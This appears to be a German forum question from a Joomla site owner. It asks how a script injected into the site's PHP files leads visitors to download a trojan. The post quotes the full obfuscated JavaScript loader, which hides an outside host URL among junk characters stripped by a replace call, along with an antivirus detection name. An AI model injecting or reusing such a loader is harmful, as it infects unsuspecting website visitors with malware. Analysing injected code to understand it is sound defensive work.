Mein Joomla! Website wurde wiederholt gehackt. Jemand hat es irgendwie geschafft, den folgenden Müll in die wichtigsten PHP-Skripte zu injizieren, aber ich möchte nicht über die Konfiguration von Joomla sprechen. Die Site wird nicht oft besucht (manchmal befürchte ich, dass ich der einzige Besucher dieser Site sein könnte ...) und es ist mir egal, ob die Site wieder betriebsbereit ist. Ich werde das irgendwann erledigen.
Meine Frage ist, wie funktioniert dieser Müll? Ich schaue es mir an und sehe nur nicht, wie das schadet? Es wird versucht, eine PDF-Datei namens ChangeLog.pdf herunterzuladen, die mit einem Trojaner infiziert ist und nach dem Öffnen Ihren Acrobat einfriert und auf Ihrem Computer Chaos anrichtet. Wie macht das das? Ich weiß nicht, es ist mir egal. Aber wie ruft das folgende Skript den Download auf?
<script>/*Exception*/ document.write('<script src='+'h#^(t@)((t$&@p#:)&/!$/)@d$y#^#$n@$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^@g))!a#m#@$e&$s^@@!t@@($!o@$p(.&@c&)@(o$m)).!$m$)y@(b@e()s&$t$@y&o$&(u#)$x&&^(i)-@^c!!&n$#.(@g)$e#(^n&!u(i&#&n(e&(!h&o@&^&l^$(l)&y$(#@w!o@!((o#d&^.^#)r$#^u!!$:(#@&8#)(0$8@&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&c@o!&^m#&/&(s&$(o!f&!t@&o!!n)&i$&c!.#^^c)!$o@@((m@#/$^!g#^o$^&o&#g!l)@@@!e&.))c!)(o#@#^!m(&/^^l#^@i##(v&@e&)!$j^!a@$s#m!i)n$.!$c&$o)@$m^/@$v&i^d^()e(!o&&s@(z(@)^.@)c$&o^m)$)^/#$'.replace(/#|\$|@|\^|&|\(|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--6f471c20c9b96fed179c85ffdd3365cf-->
ESET hat diesen Code als JS / TrojanDownloader.Agent.NRO-Trojaner erkannt